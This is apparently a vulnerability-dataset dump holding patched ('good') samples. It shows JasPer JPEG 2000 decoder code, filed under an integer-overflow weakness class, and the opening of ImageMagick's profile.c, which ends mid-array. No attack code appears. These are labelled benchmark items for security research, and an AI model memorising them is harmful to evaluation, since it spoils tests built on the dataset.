jpc_dec_prc_t *prc;
int prcno;
jpc_dec_cblk_t *cblk;
int cblkno;
for (tileno = 0, tile = dec->tiles; tileno < dec->numtiles;
++tileno, ++tile) {
for (compno = 0, tcomp = tile->tcomps; compno < dec->numcomps;
++compno, ++tcomp) {
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno <
tcomp->numrlvls; ++rlvlno, ++rlvl) {
fprintf(out, "RESOLUTION LEVEL %d\n", rlvlno);
fprintf(out, "xs =%"PRIuFAST32", ys = %"PRIuFAST32", xe = %"PRIuFAST32", ye = %"PRIuFAST32", w = %"PRIuFAST32", h = %"PRIuFAST32"\n",
rlvl->xstart, rlvl->ystart, rlvl->xend, rlvl->yend, rlvl->xend -
rlvl->xstart, rlvl->yend - rlvl->ystart);
for (bandno = 0, band = rlvl->bands;
bandno < rlvl->numbands; ++bandno, ++band) {
fprintf(out, "BAND %d\n", bandno);
fprintf(out, "xs =%"PRIiFAST32", ys = %"PRIiFAST32", xe = %"PRIiFAST32", ye = %"PRIiFAST32", w = %"PRIiFAST32", h = %"PRIiFAST32"\n",
jas_seq2d_xstart(band->data), jas_seq2d_ystart(band->data), jas_seq2d_xend(band->data),
jas_seq2d_yend(band->data), jas_seq2d_xend(band->data) - jas_seq2d_xstart(band->data),
jas_seq2d_yend(band->data) - jas_seq2d_ystart(band->data));
for (prcno = 0, prc = band->prcs;
prcno < rlvl->numprcs; ++prcno,
++prc) {
fprintf(out, "CODE BLOCK GROUP %d\n", prcno);
fprintf(out, "xs =%"PRIuFAST32", ys = %"PRIuFAST32", xe = %"PRIuFAST32", ye = %"PRIuFAST32", w = %"PRIuFAST32", h = %"PRIuFAST32"\n",
prc->xstart, prc->ystart, prc->xend, prc->yend, prc->xend -
prc->xstart, prc->yend - prc->ystart);
for (cblkno = 0, cblk =
prc->cblks; cblkno <
prc->numcblks; ++cblkno,
++cblk) {
fprintf(out, "CODE BLOCK %d\n", cblkno);
fprintf(out, "xs =%"PRIiFAST32", ys = %"PRIiFAST32", xe = %"PRIiFAST32", ye = %"PRIiFAST32", w = %"PRIiFAST32", h = %"PRIiFAST32"\n",
jas_seq2d_xstart(cblk->data), jas_seq2d_ystart(cblk->data), jas_seq2d_xend(cblk->data),
jas_seq2d_yend(cblk->data), jas_seq2d_xend(cblk->data) - jas_seq2d_xstart(cblk->data),
jas_seq2d_yend(cblk->data) - jas_seq2d_ystart(cblk->data));
}
}
}
}
}
}
return 0;
}
jpc_streamlist_t *jpc_streamlist_create()
{
jpc_streamlist_t *streamlist;
int i;
if (!(streamlist = jas_malloc(sizeof(jpc_streamlist_t)))) {
return 0;
}
streamlist->numstreams = 0;
streamlist->maxstreams = 100;
if (!(streamlist->streams = jas_alloc2(streamlist->maxstreams,
sizeof(jas_stream_t *)))) {
jas_free(streamlist);
return 0;
}
for (i = 0; i < streamlist->maxstreams; ++i) {
streamlist->streams[i] = 0;
}
return streamlist;
}
int jpc_streamlist_insert(jpc_streamlist_t *streamlist, int streamno,
jas_stream_t *stream)
{
jas_stream_t **newstreams;
int newmaxstreams;
int i;
/* Grow the array of streams if necessary. */
if (streamlist->numstreams >= streamlist->maxstreams) {
newmaxstreams = streamlist->maxstreams + 1024;
if (!(newstreams = jas_realloc2(streamlist->streams, newmaxstreams,
sizeof(jas_stream_t *)))) {
return -1;
}
/* Clear the newly added slots, using the reallocated buffer. */
for (i = streamlist->numstreams; i < newmaxstreams; ++i) {
newstreams[i] = 0;
}
streamlist->maxstreams = newmaxstreams;
streamlist->streams = newstreams;
}
if (streamno != streamlist->numstreams) {
/* Can only handle insertion at the end of the list (append). */
return -1;
}
streamlist->streams[streamno] = stream;
++streamlist->numstreams;
return 0;
}
jas_stream_t *jpc_streamlist_remove(jpc_streamlist_t *streamlist, int streamno)
{
jas_stream_t *stream;
int i;
if (streamno >= streamlist->numstreams) {
abort();
}
stream = streamlist->streams[streamno];
for (i = streamno + 1; i < streamlist->numstreams; ++i) {
streamlist->streams[i - 1] = streamlist->streams[i];
}
--streamlist->numstreams;
return stream;
}
void jpc_streamlist_destroy(jpc_streamlist_t *streamlist)
{
int streamno;
if (streamlist->streams) {
for (streamno = 0; streamno < streamlist->numstreams;
++streamno) {
jas_stream_close(streamlist->streams[streamno]);
}
jas_free(streamlist->streams);
}
jas_free(streamlist);
}
jas_stream_t *jpc_streamlist_get(jpc_streamlist_t *streamlist, int streamno)
{
assert(streamno < streamlist->numstreams);
return streamlist->streams[streamno];
}
int jpc_streamlist_numstreams(jpc_streamlist_t *streamlist)
{
return streamlist->numstreams;
}
jpc_ppxstab_t *jpc_ppxstab_create()
{
jpc_ppxstab_t *tab;
if (!(tab = jas_malloc(sizeof(jpc_ppxstab_t)))) {
return 0;
}
tab->numents = 0;
tab->maxents = 0;
tab->ents = 0;
return tab;
}
void jpc_ppxstab_destroy(jpc_ppxstab_t *tab)
{
int i;
for (i = 0; i < tab->numents; ++i) {
jpc_ppxstabent_destroy(tab->ents[i]);
}
if (tab->ents) {
jas_free(tab->ents);
}
jas_free(tab);
}
int jpc_ppxstab_grow(jpc_ppxstab_t *tab, int maxents)
{
jpc_ppxstabent_t **newents;
if (tab->maxents < maxents) {
newents = (tab->ents) ? jas_realloc2(tab->ents, maxents,
sizeof(jpc_ppxstabent_t *)) : jas_alloc2(maxents, sizeof(jpc_ppxstabent_t *));
if (!newents) {
return -1;
}
tab->ents = newents;
tab->maxents = maxents;
}
return 0;
}
int jpc_ppxstab_insert(jpc_ppxstab_t *tab, jpc_ppxstabent_t *ent)
{
int inspt;
int i;
for (i = 0; i < tab->numents; ++i) {
if (tab->ents[i]->ind > ent->ind) {
break;
}
}
inspt = i;
if (tab->numents >= tab->maxents) {
if (jpc_ppxstab_grow(tab, tab->maxents + 128)) {
return -1;
}
}
for (i = tab->numents; i > inspt; --i) {
tab->ents[i] = tab->ents[i - 1];
}
tab->ents[i] = ent;
++tab->numents;
return 0;
}
jpc_streamlist_t *jpc_ppmstabtostreams(jpc_ppxstab_t *tab)
{
jpc_streamlist_t *streams;
uchar *dataptr;
uint_fast32_t datacnt;
uint_fast32_t tpcnt;
jpc_ppxstabent_t *ent;
int entno;
jas_stream_t *stream;
int n;
if (!(streams = jpc_streamlist_create())) {
goto error;
}
if (!tab->numents) {
return streams;
}
entno = 0;
ent = tab->ents[entno];
dataptr = ent->data;
datacnt = ent->len;
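/* Note: the table entries hold the bodies of the PPM marker segments in
order.  Viewed as one byte stream, the data is a sequence of 4-byte
big-endian length fields, each followed by that many bytes of packet
header data for one tile-part.  The header data may straddle an entry
boundary; a length field that would straddle one is rejected below. */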
for (;;) {
/* Get the length of the packet header data for the current
tile-part. */
if (datacnt < 4) {
goto error;
}
if (!(stream = jas_stream_memopen(0, 0))) {
goto error;
}
if (jpc_streamlist_insert(streams, jpc_streamlist_numstreams(streams),
stream)) {
goto error;
}
tpcnt = (JAS_CAST(uint_fast32_t, dataptr[0]) << 24) |
  (JAS_CAST(uint_fast32_t, dataptr[1]) << 16) |
  (JAS_CAST(uint_fast32_t, dataptr[2]) << 8) |
  JAS_CAST(uint_fast32_t, dataptr[3]);
datacnt -= 4;
dataptr += 4;
/* Get the packet header data for the current tile-part. */
while (tpcnt) {
if (!datacnt) {
if (++entno >= tab->numents) {
goto error;
}
ent = tab->ents[entno];
dataptr = ent->data;
datacnt = ent->len;
}
n = JAS_MIN(tpcnt, datacnt);
if (jas_stream_write(stream, dataptr, n) != n) {
goto error;
}
tpcnt -= n;
dataptr += n;
datacnt -= n;
}
jas_stream_rewind(stream);
if (!datacnt) {
if (++entno >= tab->numents) {
break;
}
ent = tab->ents[entno];
dataptr = ent->data;
datacnt = ent->len;
}
}
return streams;
error:
if (streams) {
jpc_streamlist_destroy(streams);
}
return 0;
}
int jpc_pptstabwrite(jas_stream_t *out, jpc_ppxstab_t *tab)
{
int i;
jpc_ppxstabent_t *ent;
for (i = 0; i < tab->numents; ++i) {
ent = tab->ents[i];
if (jas_stream_write(out, ent->data, ent->len) != JAS_CAST(int, ent->len)) {
return -1;
}
}
return 0;
}
jpc_ppxstabent_t *jpc_ppxstabent_create()
{
jpc_ppxstabent_t *ent;
if (!(ent = jas_malloc(sizeof(jpc_ppxstabent_t)))) {
return 0;
}
ent->data = 0;
ent->len = 0;
ent->ind = 0;
return ent;
}
void jpc_ppxstabent_destroy(jpc_ppxstabent_t *ent)
{
if (ent->data) {
jas_free(ent->data);
}
jas_free(ent);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5412_0 |
crossvul-cpp_data_good_5177_0 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% PPPP RRRR OOO FFFFF IIIII L EEEEE %
% P P R R O O F I L E %
% PPPP RRRR O O FFF I L EEE %
% P R R O O F I L E %
% P R R OOO F IIIII LLLLL EEEEE %
% %
% %
% MagickCore Image Profile Methods %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2016 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% http://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/attribute.h"
#include "MagickCore/cache.h"
#include "MagickCore/color.h"
#include "MagickCore/colorspace-private.h"
#include "MagickCore/configure.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/image.h"
#include "MagickCore/linked-list.h"
#include "MagickCore/memory_.h"
#include "MagickCore/monitor.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/option.h"
#include "MagickCore/option-private.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/profile.h"
#include "MagickCore/profile-private.h"
#include "MagickCore/property.h"
#include "MagickCore/quantum.h"
#include "MagickCore/quantum-private.h"
#include "MagickCore/resource_.h"
#include "MagickCore/splay-tree.h"
#include "MagickCore/string_.h"
#include "MagickCore/thread-private.h"
#include "MagickCore/token.h"
#include "MagickCore/utility.h"
#if defined(MAGICKCORE_LCMS_DELEGATE)
#if defined(MAGICKCORE_HAVE_LCMS_LCMS2_H)
#include <wchar.h>
#include <lcms/lcms2.h>
#else
#include <wchar.h>
#include "lcms2.h"
#endif
#endif
/*
Forward declarations
*/
static MagickBooleanType
SetImageProfileInternal(Image *,const char *,const StringInfo *,
const MagickBooleanType,ExceptionInfo *);
static void
WriteTo8BimProfile(Image *,const char*,const StringInfo *);
/*
Typedef declarations
*/
struct _ProfileInfo
{
char
*name;
size_t
length;
unsigned char
*info;
size_t
signature;
};
typedef struct _CMSExceptionInfo
{
Image
*image;
ExceptionInfo
*exception;
} CMSExceptionInfo;
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% C l o n e I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% CloneImageProfiles() clones one or more image profiles.
%
% The format of the CloneImageProfiles method is:
%
% MagickBooleanType CloneImageProfiles(Image *image,
% const Image *clone_image)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o clone_image: the clone image.
%
*/
MagickExport MagickBooleanType CloneImageProfiles(Image *image,
const Image *clone_image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(clone_image != (const Image *) NULL);
assert(clone_image->signature == MagickCoreSignature);
if (clone_image->profiles != (void *) NULL)
{
if (image->profiles != (void *) NULL)
DestroyImageProfiles(image);
image->profiles=CloneSplayTree((SplayTreeInfo *) clone_image->profiles,
(void *(*)(void *)) ConstantString,(void *(*)(void *)) CloneStringInfo);
}
return(MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e l e t e I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DeleteImageProfile() deletes a profile from the image by its name.
%
% The format of the DeleteImageProfile method is:
%
% MagickBooleanType DeleteImageProfile(Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport MagickBooleanType DeleteImageProfile(Image *image,const char *name)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return(MagickFalse);
WriteTo8BimProfile(image,name,(StringInfo *) NULL);
return(DeleteNodeFromSplayTree((SplayTreeInfo *) image->profiles,name));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% D e s t r o y I m a g e P r o f i l e s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% DestroyImageProfiles() releases memory associated with an image profile map.
%
% The format of the DestroyImageProfiles method is:
%
% void DestroyImageProfiles(Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport void DestroyImageProfiles(Image *image)
{
if (image->profiles != (SplayTreeInfo *) NULL)
image->profiles=DestroySplayTree((SplayTreeInfo *) image->profiles);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageProfile() gets a profile associated with an image by name.
%
% The format of the GetImageProfile method is:
%
% const StringInfo *GetImageProfile(const Image *image,const char *name)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: the profile name.
%
*/
MagickExport const StringInfo *GetImageProfile(const Image *image,
const char *name)
{
const StringInfo
*profile;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((StringInfo *) NULL);
profile=(const StringInfo *) GetValueFromSplayTree((SplayTreeInfo *)
image->profiles,name);
return(profile);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t N e x t I m a g e P r o f i l e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetNextImageProfile() gets the next profile name for an image.
%
% The format of the GetNextImageProfile method is:
%
% char *GetNextImageProfile(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport char *GetNextImageProfile(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->profiles == (SplayTreeInfo *) NULL)
return((char *) NULL);
return((char *) GetNextKeyInSplayTree((SplayTreeInfo *) image->profiles));
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% P r o f i l e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ProfileImage() associates, applies, or removes an ICM, IPTC, or generic
% profile with / to / from an image. If the profile is NULL, it is removed
% from the image; otherwise it is added or applied. Use a name of '*' and a
% profile of NULL to remove all profiles from the image.
%
% ICC and ICM profiles are handled as follows: If the image does not have
% an associated color profile, the one you provide is associated with the
% image and the image pixels are not transformed. Otherwise, the colorspace
% transform defined by the existing and new profiles is applied to the image
% pixels and the new profile is associated with the image.
%
% The format of the ProfileImage method is:
%
% MagickBooleanType ProfileImage(Image *image,const char *name,
% const void *datum,const size_t length,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o name: Name of profile to add or remove: ICC, IPTC, or generic profile.
%
% o datum: the profile data.
%
% o length: the length of the profile.
%
% o exception: return any errors or warnings in this structure.
%
*/
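/*
  Illustrative usage sketch (not part of the library proper): a caller might
  read an ICC profile from disk, apply it, and later strip all profiles.
  The variable names and the "sRGB.icc" filename below are hypothetical, and
  error handling is reduced to the essentials.

    StringInfo *icc=FileToStringInfo("sRGB.icc",~0UL,exception);
    if (icc != (StringInfo *) NULL)
      {
        (void) ProfileImage(image,"icc",GetStringInfoDatum(icc),
          GetStringInfoLength(icc),exception);
        icc=DestroyStringInfo(icc);
      }
    (void) ProfileImage(image,"*",(const void *) NULL,0,exception);
*/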
#if defined(MAGICKCORE_LCMS_DELEGATE)
static unsigned short **DestroyPixelThreadSet(unsigned short **pixels)
{
register ssize_t
i;
assert(pixels != (unsigned short **) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (pixels[i] != (unsigned short *) NULL)
pixels[i]=(unsigned short *) RelinquishMagickMemory(pixels[i]);
pixels=(unsigned short **) RelinquishMagickMemory(pixels);
return(pixels);
}
static unsigned short **AcquirePixelThreadSet(const size_t columns,
const size_t channels)
{
register ssize_t
i;
unsigned short
**pixels;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
pixels=(unsigned short **) AcquireQuantumMemory(number_threads,
sizeof(*pixels));
if (pixels == (unsigned short **) NULL)
return((unsigned short **) NULL);
(void) ResetMagickMemory(pixels,0,number_threads*sizeof(*pixels));
for (i=0; i < (ssize_t) number_threads; i++)
{
pixels[i]=(unsigned short *) AcquireQuantumMemory(columns,channels*
sizeof(**pixels));
if (pixels[i] == (unsigned short *) NULL)
return(DestroyPixelThreadSet(pixels));
}
return(pixels);
}
static cmsHTRANSFORM *DestroyTransformThreadSet(cmsHTRANSFORM *transform)
{
register ssize_t
i;
assert(transform != (cmsHTRANSFORM *) NULL);
for (i=0; i < (ssize_t) GetMagickResourceLimit(ThreadResource); i++)
if (transform[i] != (cmsHTRANSFORM) NULL)
cmsDeleteTransform(transform[i]);
transform=(cmsHTRANSFORM *) RelinquishMagickMemory(transform);
return(transform);
}
static cmsHTRANSFORM *AcquireTransformThreadSet(Image *image,
const cmsHPROFILE source_profile,const cmsUInt32Number source_type,
const cmsHPROFILE target_profile,const cmsUInt32Number target_type,
const int intent,const cmsUInt32Number flags)
{
cmsHTRANSFORM
*transform;
register ssize_t
i;
size_t
number_threads;
number_threads=(size_t) GetMagickResourceLimit(ThreadResource);
transform=(cmsHTRANSFORM *) AcquireQuantumMemory(number_threads,
sizeof(*transform));
if (transform == (cmsHTRANSFORM *) NULL)
return((cmsHTRANSFORM *) NULL);
(void) ResetMagickMemory(transform,0,number_threads*sizeof(*transform));
for (i=0; i < (ssize_t) number_threads; i++)
{
transform[i]=cmsCreateTransformTHR((cmsContext) image,source_profile,
source_type,target_profile,target_type,intent,flags);
if (transform[i] == (cmsHTRANSFORM) NULL)
return(DestroyTransformThreadSet(transform));
}
return(transform);
}
#endif
#if defined(MAGICKCORE_LCMS_DELEGATE)
static void CMSExceptionHandler(cmsContext context,cmsUInt32Number severity,
const char *message)
{
CMSExceptionInfo
*cms_exception;
ExceptionInfo
*exception;
Image
*image;
cms_exception=(CMSExceptionInfo *) context;
image=cms_exception->image;
exception=cms_exception->exception;
if (image == (Image *) NULL)
{
(void) ThrowMagickException(exception,GetMagickModule(),ImageWarning,
"UnableToTransformColorspace","`%s'","unknown context");
return;
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(TransformEvent,GetMagickModule(),"lcms: #%u, %s",
severity,message != (char *) NULL ? message : "no message");
(void) ThrowMagickException(exception,GetMagickModule(),ImageWarning,
"UnableToTransformColorspace","`%s'",image->filename);
}
#endif
static MagickBooleanType SetsRGBImageProfile(Image *image,
ExceptionInfo *exception)
{
static unsigned char
sRGBProfile[] =
{
0x00, 0x00, 0x0c, 0x8c, 0x61, 0x72, 0x67, 0x6c, 0x02, 0x20, 0x00, 0x00,
0x6d, 0x6e, 0x74, 0x72, 0x52, 0x47, 0x42, 0x20, 0x58, 0x59, 0x5a, 0x20,
0x07, 0xde, 0x00, 0x01, 0x00, 0x06, 0x00, 0x16, 0x00, 0x0f, 0x00, 0x3a,
0x61, 0x63, 0x73, 0x70, 0x4d, 0x53, 0x46, 0x54, 0x00, 0x00, 0x00, 0x00,
0x49, 0x45, 0x43, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf6, 0xd6,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0xd3, 0x2d, 0x61, 0x72, 0x67, 0x6c,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x01, 0x50, 0x00, 0x00, 0x00, 0x99,
0x63, 0x70, 0x72, 0x74, 0x00, 0x00, 0x01, 0xec, 0x00, 0x00, 0x00, 0x67,
0x64, 0x6d, 0x6e, 0x64, 0x00, 0x00, 0x02, 0x54, 0x00, 0x00, 0x00, 0x70,
0x64, 0x6d, 0x64, 0x64, 0x00, 0x00, 0x02, 0xc4, 0x00, 0x00, 0x00, 0x88,
0x74, 0x65, 0x63, 0x68, 0x00, 0x00, 0x03, 0x4c, 0x00, 0x00, 0x00, 0x0c,
0x76, 0x75, 0x65, 0x64, 0x00, 0x00, 0x03, 0x58, 0x00, 0x00, 0x00, 0x67,
0x76, 0x69, 0x65, 0x77, 0x00, 0x00, 0x03, 0xc0, 0x00, 0x00, 0x00, 0x24,
0x6c, 0x75, 0x6d, 0x69, 0x00, 0x00, 0x03, 0xe4, 0x00, 0x00, 0x00, 0x14,
0x6d, 0x65, 0x61, 0x73, 0x00, 0x00, 0x03, 0xf8, 0x00, 0x00, 0x00, 0x24,
0x77, 0x74, 0x70, 0x74, 0x00, 0x00, 0x04, 0x1c, 0x00, 0x00, 0x00, 0x14,
0x62, 0x6b, 0x70, 0x74, 0x00, 0x00, 0x04, 0x30, 0x00, 0x00, 0x00, 0x14,
0x72, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x44, 0x00, 0x00, 0x00, 0x14,
0x67, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x58, 0x00, 0x00, 0x00, 0x14,
0x62, 0x58, 0x59, 0x5a, 0x00, 0x00, 0x04, 0x6c, 0x00, 0x00, 0x00, 0x14,
0x72, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x67, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x62, 0x54, 0x52, 0x43, 0x00, 0x00, 0x04, 0x80, 0x00, 0x00, 0x08, 0x0c,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3f,
0x73, 0x52, 0x47, 0x42, 0x20, 0x49, 0x45, 0x43, 0x36, 0x31, 0x39, 0x36,
0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x28, 0x45, 0x71, 0x75, 0x69, 0x76,
0x61, 0x6c, 0x65, 0x6e, 0x74, 0x20, 0x74, 0x6f, 0x20, 0x77, 0x77, 0x77,
0x2e, 0x73, 0x72, 0x67, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x20, 0x31, 0x39,
0x39, 0x38, 0x20, 0x48, 0x50, 0x20, 0x70, 0x72, 0x6f, 0x66, 0x69, 0x6c,
0x65, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x3f, 0x73, 0x52, 0x47, 0x42, 0x20, 0x49, 0x45, 0x43, 0x36, 0x31,
0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x28, 0x45, 0x71, 0x75,
0x69, 0x76, 0x61, 0x6c, 0x65, 0x6e, 0x74, 0x20, 0x74, 0x6f, 0x20, 0x77,
0x77, 0x77, 0x2e, 0x73, 0x72, 0x67, 0x62, 0x2e, 0x63, 0x6f, 0x6d, 0x20,
0x31, 0x39, 0x39, 0x38, 0x20, 0x48, 0x50, 0x20, 0x70, 0x72, 0x6f, 0x66,
0x69, 0x6c, 0x65, 0x29, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 0x00, 0x43, 0x72, 0x65, 0x61,
0x74, 0x65, 0x64, 0x20, 0x62, 0x79, 0x20, 0x47, 0x72, 0x61, 0x65, 0x6d,
0x65, 0x20, 0x57, 0x2e, 0x20, 0x47, 0x69, 0x6c, 0x6c, 0x2e, 0x20, 0x52,
0x65, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x64, 0x20, 0x69, 0x6e, 0x74, 0x6f,
0x20, 0x74, 0x68, 0x65, 0x20, 0x70, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x20,
0x64, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x2e, 0x20, 0x4e, 0x6f, 0x20, 0x57,
0x61, 0x72, 0x72, 0x61, 0x6e, 0x74, 0x79, 0x2c, 0x20, 0x55, 0x73, 0x65,
0x20, 0x61, 0x74, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x6f, 0x77, 0x6e,
0x20, 0x72, 0x69, 0x73, 0x6b, 0x2e, 0x00, 0x00, 0x64, 0x65, 0x73, 0x63,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x16, 0x49, 0x45, 0x43, 0x20,
0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x69,
0x65, 0x63, 0x2e, 0x63, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x16, 0x49, 0x45, 0x43, 0x20, 0x68, 0x74, 0x74,
0x70, 0x3a, 0x2f, 0x2f, 0x77, 0x77, 0x77, 0x2e, 0x69, 0x65, 0x63, 0x2e,
0x63, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x64, 0x65, 0x73, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2e,
0x49, 0x45, 0x43, 0x20, 0x36, 0x31, 0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e,
0x31, 0x20, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x20, 0x52, 0x47,
0x42, 0x20, 0x63, 0x6f, 0x6c, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x70, 0x61,
0x63, 0x65, 0x20, 0x2d, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2e, 0x49, 0x45, 0x43,
0x20, 0x36, 0x31, 0x39, 0x36, 0x36, 0x2d, 0x32, 0x2e, 0x31, 0x20, 0x44,
0x65, 0x66, 0x61, 0x75, 0x6c, 0x74, 0x20, 0x52, 0x47, 0x42, 0x20, 0x63,
0x6f, 0x6c, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x70, 0x61, 0x63, 0x65, 0x20,
0x2d, 0x20, 0x73, 0x52, 0x47, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
